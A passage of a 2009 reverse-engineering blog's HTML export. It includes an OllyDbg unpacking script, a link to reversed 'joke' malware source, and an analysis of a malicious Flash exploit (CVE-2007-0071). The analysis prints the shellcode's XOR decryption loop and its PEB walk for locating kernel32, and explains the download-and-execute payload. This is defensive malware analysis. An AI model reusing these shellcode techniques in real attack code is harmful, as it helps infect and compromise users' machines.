153);font-family:courier new;font-size:85%;" >// find next POPAD</span><span style="font-size:85%;"><br /><span style="font-family:courier new;">mov hwdBP, $RESULT </span></span><span style="color: rgb(0, 0, 153);font-family:courier new;font-size:85%;" > </span><span style="color: rgb(0, 0, 153);font-family:courier new;font-size:85%;" >// Store $RESULT to hardware breakpoint local variable</span><span style="font-size:85%;"><br /><span style="font-family:courier new;">bphws hwdBP, "x" </span></span><span style="color: rgb(0, 0, 153);font-family:courier new;font-size:85%;" >// Set hardware breakpoint (execute) on the next POPAD</span><span style="font-size:85%;"><br /><span style="font-family:courier new;">run </span></span><span style="color: rgb(0, 0, 153);font-family:courier new;font-size:85%;" >// Run F9 command</span><span style="font-size:85%;"><br /><span style="font-family:courier new;">findop eip, #E9????????# </span></span><span style="color: rgb(0, 0, 153);font-family:courier new;font-size:85%;" >// Find the next JMP</span><span style="font-size:85%;"><br /><span style="font-family:courier new;">mov softBP, $RESULT </span></span><span style="color: rgb(0, 0, 153);font-family:courier new;font-size:85%;" >// Store $RESULT to software breakpoint local variable</span><span style="font-size:85%;"><br /><span style="font-family:courier new;">bp softBP</span><br /><span style="font-family:courier new;">run </span></span><span style="color: rgb(0, 0, 153);font-family:courier new;font-size:85%;" >// Run to JMP instruction</span><span style="font-size:85%;"><br /><span style="font-family:courier new;">sti </span></span><span style="color: rgb(0, 0, 102);font-family:courier new;font-size:85%;" > <span style="color: rgb(0, 0, 153);">// Step into the OEP</span></span><span style="font-size:85%;"><br /><span style="font-family:courier new;">cmt eip, "<<<oep>>>"</span><br /><span style="font-family:courier new;">msg "OEP found, you can dump the file starting from this address"</span><br /><span style="font-family:courier new;">ret</span></span><blockquote></blockquote><br /><span style="font-weight: bold;">Downloads</span>:<br /><br /><a href="http://www.4shared.com/file/119824919/ec4b052e/Olly_Script_Editor_v20.html">Ollyscript Editor V2.0</a><br /><a href="http://www.4shared.com/file/119824779/b08f8fa2/OllyScript-094.html">Ollyscript Plugin V0.94 - <span style="font-style: italic;">ORIGINAL_README.txt - List of Ollyscript Commands by SHaG</span></a><br /><a href="http://www.4shared.com/file/119823896/2838c039/ARTeam_eZine_Number2.html">ARTeam_eZine_Number2.rar - <span style="font-style: italic;">Page 36 - Writing OllyDbg Scripts, Buzifer of Team RESURRECTiON from ARTeam</span><br /></a><br />Signing off<br />~x9090<br /><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"><br /></script><br /><script type="text/javascript"><!-- google_ad_client = "pub-9154929752124078"; /* x9090.blogspot.com */ google_ad_slot = "4738578270"; google_ad_width = 728; google_ad_height = 90; //--><br /></script>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com3tag:blogger.com,1999:blog-1022731470813881575.post-18779070161565274972009-07-21T18:16:00.006+08:002009-07-21T19:05:15.224+08:00Joke?Malware?I found an interesting malware, but strictly speaking it is not really a malware. Instead it plays joke on the machine and does not lead to any harmful activities.<br /><br />This is the latest scan result from <a href="http://virscan.org/report/a4eabb31bb54ad36928f28f7996d6ee8.html">Virscan</a>.<br /><br /><div style="text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dx1JY3MaCgN2BVkbXqH9ddh3HBu80PFYpheOfwicyC4hgMfW9DefpqmLUcXAgAMQYWXgW8h-eDKtmTOmY6oZw' class='b-hbp-video b-uploaded' frameborder='0'></iframe><br /></div><br />I manage to reverse it and produce the source code. The source code is attached.<br /><br />Attachment: <a href="http://www.4shared.com/file/119545558/7d5888c3/Joke.html">Joke.c</a><br /><br />Have fun! ;)<br /><br />Signing off<br />~x9090<br /><script type="text/javascript"><!-- google_ad_client = "pub-9154929752124078"; /* x9090.blogspot.com */ google_ad_slot = "4738578270"; google_ad_width = 728; google_ad_height = 90; //--><br /><br /><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"><br /></script></script>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com1tag:blogger.com,1999:blog-1022731470813881575.post-28196617727240578522009-05-30T12:46:00.037+08:002009-06-06T11:24:43.794+08:00SWF Exploit Analysis - Part 2<span style="font-weight: bold;">Overview</span><br /><br />After we obtain the shellcode from the exploited SWF in the previous <a href="http://x9090.blogspot.com/2009/05/swf-exploit-analysis-part-1.html">post</a>, we can understand what is its payload (action of the malware). But before that we should deobfuscate the shellcode first if not it is impossible for us to continue the malware's behavior analysis.<br /><br /><br /><span style="font-weight: bold;">Analysis of shellcode</span><br /><br />Again this is the extracted file from the exploit:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJd3eJeHFQGvsG8fXi01wga0CXJWFcftc7oXblMtIzJy9DJEfw-C5-Q9Mtx6ppcyrP0d2wl0msUHxBigOdshG85q5YdY601lZI-ZwyOP4CdzZ9ss4rblpViUd38180peIyQr_gyrC_4JfW/s1600-h/shellcode_obfuscated.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 285px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJd3eJeHFQGvsG8fXi01wga0CXJWFcftc7oXblMtIzJy9DJEfw-C5-Q9Mtx6ppcyrP0d2wl0msUHxBigOdshG85q5YdY601lZI-ZwyOP4CdzZ9ss4rblpViUd38180peIyQr_gyrC_4JfW/s320/shellcode_obfuscated.JPG" alt="" id="BLOGGER_PHOTO_ID_5341482718917265986" border="0" /></a><br />You can load the file with IDA Pro and remember to use 32-bit disassembler mode. Do a full code analysis (<span style="font-weight: bold;">Highlight </span>all the code > Press <span style="font-weight: bold;">C </span>> Select <span style="font-weight: bold;">Force </span>analysis) and here is the result and its decryption routine:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiom-oUi2OQDdJbBJAdNaH33HOla_i-vFXY_9NjI8w1ELfI7tKd6meWW7y1eFK9UZ7Xo-W7jaYZ48QowgvilB6zbm6EAhROv1_pGLUe0gAv9xtZsAdYKQ_cyqhSyI6agJFCTklzr1vSgi3l/s1600-h/ida_1.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 149px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiom-oUi2OQDdJbBJAdNaH33HOla_i-vFXY_9NjI8w1ELfI7tKd6meWW7y1eFK9UZ7Xo-W7jaYZ48QowgvilB6zbm6EAhROv1_pGLUe0gAv9xtZsAdYKQ_cyqhSyI6agJFCTklzr1vSgi3l/s320/ida_1.JPG" alt="" id="BLOGGER_PHOTO_ID_5341492826531563794" border="0" /></a><br />The reason why I think this is the decryption routine is very simple. Because the code make sense to me ;)<br /><br />The encrypted code will call the decryption routine before executing the payload. By looking at the CALL instructions, I found this portion of code make sense to me:<br /><br />000000EB call loc_F0 <span style="font-style: italic;"> ; Call the decryptor code</span><br />000000F0<br />000000F0 loc_F0: <span style="font-style: italic;">; DATA XREF: 000000EB</span><br />000000F0 pop ebp <span style="font-style: italic;">; Save the original values of stack in EBP</span><br />000000F1 add ebp, 14h <span style="font-style: italic;">; Increment the frame pointer by 14h</span><br />000000F4 mov ecx, 18Bh <span style="font-style: italic;">; Set ECX to 18Bh as a counter</span><br />000000F9 mov al, 3Dh ; '=' <span style="font-style: italic;">; Save the XOR key "3D" to AL</span><br />000000FB<br />000000FB loc_FB: <span style="font-style: italic;">; CODE XREF: 00000100</span><br />000000FB xor [ebp+0], al <span style="font-style: italic;">; XOR the current frame pointer value+0 against AL with "3D" as the key</span><br />000000FE inc ebp <span style="font-style: italic;">; Increment the current frame pointer by 1</span><br />000000FF dec ecx <span style="font-style: italic;">; Decrement the counter ECX by 1</span><br />00000100 jnz short loc_FB <span style="font-style: italic;">; Go back to XOR instruction (offset FB) if counter is not zero</span><br />00000102 jmp short loc_104 <span style="font-style: italic;">; THIS IS THE POINT WHERE AFTER THE DECRYPTION ROUTINE, IT WILL JUMP TO THE DECRYPTED CODE</span><br />00000104 ; ---------------------------------------------------------------------------<br />00000104<br />00000104 loc_104: ; DATA XREF: 00000102<br />00000104 lodsd<br />00000105 lodsd<br />00000106 lodsd<br />00000107 lodsd<br />00000108 lodsd<br />00000109 lodsd<br />0000010A lodsd<br />0000010B lodsd<br /><br />I will be more than happy if anyone can tell me other ways to explain why this is the decryptor code if my own assumption is wrong :)<br /><br />So I will use Hiew again to decrypt the code. Take note the offset <span style="font-weight: bold;">102</span> where the instruction jump to offset<span style="font-weight: bold;"> 104 </span>which is the offset where the decryption should start from and:<br /><br />Press <span style="font-weight: bold;">F3</span> > <span style="font-weight: bold;">F8</span> and set the XOR key as "3D":<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjanWlVpdzXVzuobzkrOsN7eWfmNnnadKmLL3JYtS5wWBCsUmsFuB-skIK4KSLULbqupWlREx0thc70WnjITWs8UZLmtRH4k6Ou8NFPk21xSNrX-EmZZ_aiIGX7IZ2nZsQpHNZl6u0YKXWc/s1600-h/shellcode_deobfuscation_1.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 284px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjanWlVpdzXVzuobzkrOsN7eWfmNnnadKmLL3JYtS5wWBCsUmsFuB-skIK4KSLULbqupWlREx0thc70WnjITWs8UZLmtRH4k6Ou8NFPk21xSNrX-EmZZ_aiIGX7IZ2nZsQpHNZl6u0YKXWc/s320/shellcode_deobfuscation_1.JPG" alt="" id="BLOGGER_PHOTO_ID_5341516199257381858" border="0" /></a><br />Based on the ECX counter, we know the size of the code that needs to be decrypted is <span style="font-weight: bold;">18B</span> that is until offset <span style="font-weight: bold;">28F</span>:<br /><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggpvtY0vDTBKR8xRDys8NYSVX3YYY7XsvAY7cSQ_OTdCKDM7oChXoYsWPXuH4RJzvrUu_fenuZT-8TGGLwzZZMkTw-1T5HYsUGrDOMHy8Y2vcq1BKWWqfVXasBNFmNqnepJ8n5fbNJz35Z/s1600-h/shellcode_deobfuscation_2.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 284px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggpvtY0vDTBKR8xRDys8NYSVX3YYY7XsvAY7cSQ_OTdCKDM7oChXoYsWPXuH4RJzvrUu_fenuZT-8TGGLwzZZMkTw-1T5HYsUGrDOMHy8Y2vcq1BKWWqfVXasBNFmNqnepJ8n5fbNJz35Z/s320/shellcode_deobfuscation_2.JPG" alt="" id="BLOGGER_PHOTO_ID_5341517908077434402" border="0" /></a><br />Save the file <span style="font-weight: bold;">F9</span> and you can see the URL that the malware trying to connect and download additional malicious file:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi97-kQ10SlzUHfgbgt6tyMr1GIHeN-3aHfPK2IxZUc8o9IrPZj3TCk8uDBPtb579fVpI8tnnROpigMvnZdHvk-RDpC27YBv21Io9gN19xhyphenhyphen3AxwN2VLtYRAxuIQpnEr1wRySen7nQhDieV/s1600-h/shellcode_deobfuscation_3.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 284px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi97-kQ10SlzUHfgbgt6tyMr1GIHeN-3aHfPK2IxZUc8o9IrPZj3TCk8uDBPtb579fVpI8tnnROpigMvnZdHvk-RDpC27YBv21Io9gN19xhyphenhyphen3AxwN2VLtYRAxuIQpnEr1wRySen7nQhDieV/s320/shellcode_deobfuscation_3.JPG" alt="" id="BLOGGER_PHOTO_ID_5341520115176834866" border="0" /></a><br /><span style="font-weight: bold;">Shellcode Static Analysis</span><br /><br />The shellcode is designed to be as small as possible. So it normally contains the actual malicious payloads without importing any API functions to the code itself. So how does the shellcode operate without the necessary APIs.<br /><br />As we are performing a static analysis, the following assumptions have been made:<br /><br /><ul><li>It will first dyamically retrieve the RVA of kernel32.dll<br /></li><li>Find kernel32.dll->LoadLibrary() to load other neccessary APIs<br /></li><li>Load urlmon.dll->URLDownloadToFile() to download additional malicious files</li><li>Load kernel32.dll->WinExec() to execute the downloaded malicious files</li></ul><span style="font-weight: bold;"></span><br /><br />First of all, you might need a copy of <span style="font-weight: bold;"><a href="http://www.openrce.org/reference_library/files/reference/Windows%20Memory%20Layout,%20User-Kernel%20Address%20Spaces.pdf">Windows Memory Layout, User-Kernel Address Spaces</a> </span>and <a href="http://www.openrce.org/reference_library/files/reference/PE%20Format.pdf">PE Format Diagram</a> as a reference for PEB structure and PE format<span style="font-style: italic;"><br /><br /><br /><blockquote>seg000:0000000D pop edi<br />seg000:0000000E mov eax, [fs:30] ; Save PEB struc to EAX<br />seg000:00000014 js short loc_22<br />seg000:00000016 mov eax, [eax+0Ch] ; Get PEB_LDR_DATA struct and save to EAX<br />seg000:00000019 mov esi, [eax+1Ch] ; PEB_LDR_DATA contains 7 elements and the last elements is InInitializationOrderModuleList (@ offset 1Ch) contains the loaded modules which are linked together<br />seg000:0000001C lodsd<br />seg000:0000001D mov ebp, [eax+8] ; ; Each module is represented by LIST_ENTRY which is 4bytes long. This is the image base of kernel32.dll which is stored to ebp<br />seg000:00000020 jmp short loc_2B</blockquote><br /></span><br /><br />Open <span style="font-weight: bold;">Windows Memory Layout, User-Kernel Address Spaces</span> and refer to <span style="font-style: italic;">struct_TEB</span>. Locate offset <span style="font-style: italic;">0x030</span> which points to <span style="font-style: italic;">_PEB </span>structure.<br /><br /><br />From <span style="font-style: italic;">struct_PEB</span>, move to offset <span style="font-style: italic;">0x0c </span>which is <span style="font-style: italic;">_PEB_LDR_DATA</span> structure that contains 7 elements:<br /><br /><blockquote><br />typedef struct _PEB_LDR_DATA {<br />ULONG Length; //0x000<br />BOOLEAN Initialized; //0x004<br />PVOID SsHandle; //0x008<br />LIST_ENTRY InLoadOrderModuleList; //0x00c<br />LIST_ENTRY InMemoryOrderModuleList; //0x014<br />LIST_ENTRY <span style="font-weight: bold;">InInitializationOrderModuleList</span>; //0x01c<br />EntryInProgress / /0x024<br />} PEB_LDR_DATA, *PPEB_LDR_DATA;</blockquote><span style="font-weight: bold;"><br /><br /><a href="http://undocumented.ntinternals.net/UserMode/Structures/PEB_LDR_DATA.html">InInitializationOrderModuleList</a> </span>is a double linked list containing pointers to <a href="http://undocumented.ntinternals.net/UserMode/Structures/LDR_MODULE.html"><span style="font-weight: bold;">LDR_MODULE</span></a> structure:<br /><br /><blockquote>typedef struct _LIST_ENTRY {<br />Flink; //0x000<br />Blink; // 0x004<br />} LIST_ENTRY, *PLIST_ENTRY</blockquote><br />Using this chain, we can browse every DLL modules that are loaded by the processes and therefore we can find kernel32.dll. This is where the shellcode can find kernel32.dll as it is always located as the first item on the <span style="font-weight: bold;">InInitializationOrderModuleList</span>.<br /><br /><br />After the necessary DLLs are found, it will parse the DLL PE header to find its export table and locate the RVAs of the export function that matches the hardcoded hash calculated at 0x000000DC.<br /><br />[Note: In order to understand how the shellcode parse the PE header, you need to refer to <span style="font-weight: bold;">PE Format Diagram</span>]<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz4hV0j5isWN1NkA5ivmKbQOibCUQCeW4fheOkbbt7MscV2EG_V00bSV47VszCe9XXrrKc6VNxUKcEeJiA7Ew6t93ngiMEE17HuPMHiXMiem7FgzHxDYf7ZZhWYqgSZ50tDRtslmWvbcBH/s1600-h/ida_get_api.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 157px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz4hV0j5isWN1NkA5ivmKbQOibCUQCeW4fheOkbbt7MscV2EG_V00bSV47VszCe9XXrrKc6VNxUKcEeJiA7Ew6t93ngiMEE17HuPMHiXMiem7FgzHxDYf7ZZhWYqgSZ50tDRtslmWvbcBH/s320/ida_get_api.JPG" alt="" id="BLOGGER_PHOTO_ID_5343875064829560082" border="0" /></a><br /><br /><span style="font-weight: bold;">Final<span style="font-weight: bold;"></span><br /></span><br />I hope to show more detailed analysis like how the hardcoded addresses are generated and show you how the export function is actually loaded and called by the shellcode. This requires us to do dynamic analysis using OllyDBG with a "bait" file. I hope there is guideline on the Internet as I am lazy to find it now ;)<br /><br />I really hope to share how it can be done. Hopefully I can motivate myself and share the knowledge here asap.<br /><br /><br /><span style="font-weight: bold;">References<br /><br /></span><a href="http://zarestel.blogspot.com/2008/06/swf-exploit-cve-2007-0071.html">http://zarestel.blogspot.com/2008/06/swf-exploit-cve-2007-0071.html</a><span style="font-weight: bold;"><br /></span><a href="http://zarestel.blogspot.com/2008/06/swf-exploit-cve-2007-0071-part-2-how-to.html">http://zarestel.blogspot.com/2008/06/swf-exploit-cve-2007-0071-part-2-how-to.html</a><span style="font-weight: bold;"><br /></span><a href="http://blog.threatexpert.com/2008/05/flash-exploit-goes-wild.html">http://blog.threatexpert.com/2008/05/flash-exploit-goes-wild.html</a><span style="font-weight: bold;"><br /></span><br /><br />Signing off<br />~x9090<br /><span style="font-weight: bold;"><br /><br /><br /></span>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com1tag:blogger.com,1999:blog-1022731470813881575.post-33021416943238580502009-05-24T21:15:00.023+08:002009-05-31T17:11:49.098+08:00SWF Exploit Analysis - Part 1It has been a while since my <a href="http://x9090.blogspot.com/2009/04/manual-iat-recovery-using-imprec.html">last post</a> dated on 4 April 2009. Today I'm gonna to tell about the technical analysis on SWF (Flash Video) exploitation file.<br /><br /><span style="font-weight: bold;">Tools Needed<br /></span><ul><li><a href="http://www.swftools.org/">SWFTools</a></li><li>Disassembler - <a href="http://www.datarescue.com/">IDA Pro</a> for static analysis</li><li>Debugger - <a href="http://www.ollydbg.de/">OllyDbg</a> for dynamic analysis</li><li><a href="http://www.hiew.ru/">Hackers View (Hiew)</a> for hex view</li><li><a href="http://www.ultraedit.com/">UltraEdit</a> for generating the shellcode<br /></li></ul><span style="font-weight: bold;">Overview<br /></span><br />The analysis is divided into 2 parts. The first part will explain the decompress the SWF file and extract embedded exploited SWF file. After that it will be followed by how to locate and extract the obfuscated shellcode.<br /><br />The second part will explain how to deofuscate the shellcode and its payload.<br /><br /><span style="font-weight: bold;">Analysis of SWF</span><br /><br />This is the screenshot of the original exploit SWF file to give you an image on how does the file looks like:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyqiR4pzyS3YjhR_sUCo_6eu8-c56a4ZokDffCdPetb8ypqEw19HZvt-How4W57Rq0_1AEiCMhmh1HeiIz9Zzbwb6lefXvPkmF2re1297n4K93W4U2JsVuiNAYqRSZshEwAeoIjYZPntaT/s1600-h/flash_exploit.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 278px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyqiR4pzyS3YjhR_sUCo_6eu8-c56a4ZokDffCdPetb8ypqEw19HZvt-How4W57Rq0_1AEiCMhmh1HeiIz9Zzbwb6lefXvPkmF2re1297n4K93W4U2JsVuiNAYqRSZshEwAeoIjYZPntaT/s320/flash_exploit.JPG" alt="" id="BLOGGER_PHOTO_ID_5339338641844885842" border="0" /></a><br />It is totally unreadable huh! ;) That is because the SWF file was compressed by looking at the first 3 bytes <span style="font-weight: bold;">CWS. </span>We can dump<span style="font-weight: bold;"> </span>tag <span>by using <span style="font-style: italic;">swfdump.exe</span> from <span style="font-style: italic;">SWFTools</span></span>:<br /><br /><blockquote style="font-family: courier new;">C:\bin\swftools\swfdump.exe -atpdu flash.$wf > flash.swf.swfdump</blockquote><br /><br />Output:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig1upTAHjdu_NokFtx9K4glVsNoJiUMd3m_UqXHxxVwyhyphenhyphen-wDcp07UOLAchnYH67XZ0le5M4LOpZW7Q2m3tpg6ku46fIyGWIa9x-h7gvHEgzB-T7wKVRHTKWm7-zS1yR394JEaHxNsxIjU/s1600-h/flash_swfdump_1.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 281px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig1upTAHjdu_NokFtx9K4glVsNoJiUMd3m_UqXHxxVwyhyphenhyphen-wDcp07UOLAchnYH67XZ0le5M4LOpZW7Q2m3tpg6ku46fIyGWIa9x-h7gvHEgzB-T7wKVRHTKWm7-zS1yR394JEaHxNsxIjU/s320/flash_swfdump_1.JPG" alt="" id="BLOGGER_PHOTO_ID_5339387793377234194" border="0" /></a><br />continuation...<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGjrIY5Y7LaVuErKSTq6x6-JDFIWxz_VJrJr3hEvQ5N1VczObB7Uk_4A08QQjpoh1lrDSRnNprme-fa32zS-sQbb7pYCvQiDmfwNSxlinrl8UPyG9pCqLyodb0BJzzA3tw8dj75xSHjax-/s1600-h/flash_swfdump_2.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 278px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGjrIY5Y7LaVuErKSTq6x6-JDFIWxz_VJrJr3hEvQ5N1VczObB7Uk_4A08QQjpoh1lrDSRnNprme-fa32zS-sQbb7pYCvQiDmfwNSxlinrl8UPyG9pCqLyodb0BJzzA3tw8dj75xSHjax-/s320/flash_swfdump_2.JPG" alt="" id="BLOGGER_PHOTO_ID_5339389604128971042" border="0" /></a><br />Notice that there are a number of <span style="font-weight: bold;">pushstring</span> commands, which are the hex code of the exploited SWF files. They will generate the same exploited SWF file. Extract one of the hex string from the <span style="font-weight: bold;">pushstring</span> commands into UltraEdit, like this:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4sdfv1fwdqlyvdL-CjEEaLykhNVNAmol_mjDovXIreCxPj3Rjtcv1u57VAGqf3U4N1TNxtMNk3ThTnl9GKS4Csf-BDyiHSpVMZvWxo9kZ5BwSxrRM117BtNYSedhnkLszekDMz25cIvD4/s1600-h/exploit_swf.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 198px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4sdfv1fwdqlyvdL-CjEEaLykhNVNAmol_mjDovXIreCxPj3Rjtcv1u57VAGqf3U4N1TNxtMNk3ThTnl9GKS4Csf-BDyiHSpVMZvWxo9kZ5BwSxrRM117BtNYSedhnkLszekDMz25cIvD4/s320/exploit_swf.JPG" alt="" id="BLOGGER_PHOTO_ID_5339399936387295074" border="0" /></a><br />Copy and paste the hex string and press a <span style="font-weight: bold;">SAPCEBAR </span>(yes, a <span style="font-weight: bold;">SPACEBAR</span>!!!) to create a hex code 20. After that press <span style="font-weight: bold;">Ctrl + H </span>to switch to hex mode:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzfrqbvxCzxnwwVU1tTcu1D-eqbvR22wwp7h28xNwsXhKVUlYjtu2cpmCOuEnz6HfmxN-4Veye6OX1RqYbWqg6qhntTR1Qhdh8sSxCZ_4b5TqiVyOyeDwIXiZePYAezqMOh0EvEXxm8dhL/s1600-h/exploit_swf_2.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 197px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzfrqbvxCzxnwwVU1tTcu1D-eqbvR22wwp7h28xNwsXhKVUlYjtu2cpmCOuEnz6HfmxN-4Veye6OX1RqYbWqg6qhntTR1Qhdh8sSxCZ_4b5TqiVyOyeDwIXiZePYAezqMOh0EvEXxm8dhL/s320/exploit_swf_2.JPG" alt="" id="BLOGGER_PHOTO_ID_5339401183774925090" border="0" /></a><br />Double click <span style="font-weight: bold;">20 </span>and press <span style="font-weight: bold;">Ctrl + R</span><span style="font-weight: bold;"> </span>to replace the space with hex string:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-4PIZMpPzcLpf6WV99fgfFtqMRVhJiHxKtizF4h2MeUC14TrgWtky2mjC_cYpKzGmfAeJ6SSYmaFdvp8Q3cTYMPpcP3f3KPivvdJRh05hyfFvrX12ugiUk0UtqnaeCDCCU_AK9HisVyEd/s1600-h/exploit_swf_3.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 183px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-4PIZMpPzcLpf6WV99fgfFtqMRVhJiHxKtizF4h2MeUC14TrgWtky2mjC_cYpKzGmfAeJ6SSYmaFdvp8Q3cTYMPpcP3f3KPivvdJRh05hyfFvrX12ugiUk0UtqnaeCDCCU_AK9HisVyEd/s320/exploit_swf_3.JPG" alt="" id="BLOGGER_PHOTO_ID_5339402879322872066" border="0" /></a><br />Click <span style="font-weight: bold;">Replace All </span>button and the result would be:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAaFjlbkG0qncaJT4OoFr4JJlXgRdxapYTdGf_h7hqEYQBQVKBVxd5OgHICEB44-sI_FwS7H7Pp0Qsy6inowmwP-l1aptTo-lTFpduZm9eQJQ62M1l2ztSSXP3S2C08iIky2cQvPmj8GXa/s1600-h/exploit_swf_4.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 196px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAaFjlbkG0qncaJT4OoFr4JJlXgRdxapYTdGf_h7hqEYQBQVKBVxd5OgHICEB44-sI_FwS7H7Pp0Qsy6inowmwP-l1aptTo-lTFpduZm9eQJQ62M1l2ztSSXP3S2C08iIky2cQvPmj8GXa/s320/exploit_swf_4.JPG" alt="" id="BLOGGER_PHOTO_ID_5339403411599971650" border="0" /></a><br />Under Hiew:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNCYkSPLwYBjr6nQgJOh5K0SbN7YO2qvKDXYuQ-NIDPiyE3yRnpQx2YwQb0zyGqadSWXt2xORK3j4NKBAz5Sa1ormVNeILOmXPWsaUCjP7vR_kY8gTkcSJJvkOgSOQhBjJ_GA7EX_yxS5_/s1600-h/exploit_swf_5.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 284px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNCYkSPLwYBjr6nQgJOh5K0SbN7YO2qvKDXYuQ-NIDPiyE3yRnpQx2YwQb0zyGqadSWXt2xORK3j4NKBAz5Sa1ormVNeILOmXPWsaUCjP7vR_kY8gTkcSJJvkOgSOQhBjJ_GA7EX_yxS5_/s320/exploit_swf_5.JPG" alt="" id="BLOGGER_PHOTO_ID_5339404081807077170" border="0" /></a><br />It is now more readable right ;)<br /><br />Now we can use <span style="font-style: italic;">swfdump.exe </span>again to see the tag and we need to find <span style="font-weight: bold;">DEFINEBITS </span>section where the shellcode is located:<br /><br /><blockquote style="font-family: courier new;">C:\bin\swftools\swfdump.exe -atpdu exploit_swf > exploit_swf.swfdump</blockquote><br />Output:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIdMqZDhwVyCdYMRU9dkgDx_ZpDlqtxJ2nZuXFHKM0jjcSsdygdLSyNoGSmqjJEDXunZ3iX2lQmw0mUQgEzyE_zpSYOaUhYRuitncevNXZPgjiQgbWd76zVTwEWaH2EIdB0AlRXjnQIpK0/s1600-h/shellcode_1.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 283px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIdMqZDhwVyCdYMRU9dkgDx_ZpDlqtxJ2nZuXFHKM0jjcSsdygdLSyNoGSmqjJEDXunZ3iX2lQmw0mUQgEzyE_zpSYOaUhYRuitncevNXZPgjiQgbWd76zVTwEWaH2EIdB0AlRXjnQIpK0/s320/shellcode_1.JPG" alt="" id="BLOGGER_PHOTO_ID_5339407609176075554" border="0" /></a><br />From the <span style="font-weight: bold;">DEFINEBITS </span> section, we can know the starting offset of the shellcode as well as its end offset:<br /><br />[image continuation]<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 